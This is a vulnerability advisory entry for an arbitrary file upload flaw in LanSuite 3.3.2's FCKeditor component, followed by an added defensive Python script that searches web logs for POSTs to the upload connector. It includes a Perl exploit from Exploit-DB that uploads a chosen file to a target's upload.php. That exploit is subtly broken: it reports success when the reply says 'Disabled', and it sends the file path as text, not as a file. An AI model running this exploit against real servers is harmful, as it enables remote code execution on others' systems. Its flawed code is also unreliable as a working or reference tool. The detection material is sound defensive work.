Vendor: LanSuite 3.3.2
By: Stack
CVSS: 9.3 (HIGH)
Type: Arbitrary File Upload
CWE: 434
Product Name: LanSuite 3.3.2
Affected Version From: 3.3.2002
Affected Version To: 3.3.2002
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Year: 2008

LanSuite 3.3.2 (fckeditor) Arbitrary File Upload

LanSuite 3.3.2 contains an arbitrary file upload vulnerability in its FCKeditor component. It allows an attacker to upload a malicious file to the server, which can then be used to execute arbitrary code. The flaw exists because the uploaded file is not sufficiently validated, and it is triggered by a specially crafted HTTP request that carries the malicious file to the vulnerable server.

Mitigation:

Upgrade to the latest version of LanSuite 3.3.2 or apply the patch provided by the vendor.

Exploit-DB raw data:

#!/usr/bin/perl
use strict;
use warnings;
use LWP::UserAgent;
use HTTP::Request::Common;
print <<INTRO;
+++++++++++++++++++++++++++++++++++++++++++++++++++++
+ LanSuite 3.3.2 (fckeditor) Arbitrary File Upload  +
+                                                   +
+                   By: Stack                       +
+++++++++++++++++++++++++++++++++++++++++++++++++++++
INTRO
print "Enter URL(ie: http://site.com): ";
    chomp(my $url=<STDIN>);
  
print "Enter File Path(path to local file to upload): ";
    chomp(my $file=<STDIN>);
my $ua = LWP::UserAgent->new;
my $re = $ua->request(POST $url.'/FCKeditor/editor/filemanager/upload/php/upload.php',
                      Content_Type => 'form-data',
                      Content      => [ NewFile => $file ] );
if($re->is_success) {
    if( index($re->content, "Disabled") != -1 ) { print "Exploit Successfull! File Uploaded!\n"; }
    else { print "File Upload Is Disabled! Failed!\n"; }
} else { print "HTTP Request Failed!\n"; }
exit;

# milw0rm.com [2008-09-25]
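
For defenders, the script above shows which request to look for in server logs: a POST to the FCKeditor upload connector. The following is an added example, not part of the original advisory or the Exploit-DB entry, that scans web access logs for such requests. The combined log format, the sample log lines and the function names are assumptions made for the illustration.

```python
import posixpath
import re
from collections import defaultdict
from urllib.parse import unquote

# Connector path taken from the script above; matched case-insensitively.
CONNECTOR = "/fckeditor/editor/filemanager/upload/php/upload.php"

# Assumed input: Apache/nginx "combined" access log format.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) '
)

def normalize(target):
    """Drop the query string, percent-decode, and collapse //, ./ and ../ segments."""
    path = unquote(target.split("?", 1)[0])
    path = re.sub(r"/+", "/", path)
    return posixpath.normpath(path).lower()

def find_upload_posts(lines):
    """Return {client_ip: [(timestamp, status), ...]} for POSTs to the connector."""
    hits = defaultdict(list)
    for line in lines:
        m = LINE_RE.match(line)
        if not m or m["method"] != "POST":
            continue
        # endswith() also catches installs under a sub-directory.
        if normalize(m["target"]).endswith(CONNECTOR):
            hits[m["ip"]].append((m["ts"], int(m["status"])))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, not real traffic).
SAMPLE = [
    '198.51.100.7 - - [25/Sep/2008:10:01:02 +0000] "POST /FCKeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 312 "-" "libwww-perl/5.808"',
    '198.51.100.7 - - [25/Sep/2008:10:01:09 +0000] "POST /lansuite//fckeditor/editor/./filemanager/upload/php/upload.php?x=1 HTTP/1.1" 200 298 "-" "libwww-perl/5.808"',
    '203.0.113.20 - - [25/Sep/2008:10:02:00 +0000] "GET /FCKeditor/editor/filemanager/upload/php/upload.php HTTP/1.1" 200 120 "-" "Mozilla/5.0"',
    '203.0.113.20 - - [25/Sep/2008:10:02:05 +0000] "POST /index.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [25/Sep/2008:10:03:30 +0000] "POST /FCKeditor/editor/filemanager/upload/php/upload%2Ephp HTTP/1.1" 403 199 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in find_upload_posts(SAMPLE).items():
        print(ip, events)
```

A hit with a 2xx status means the connector answered the POST, so that host should be checked against the patch state described under Mitigation.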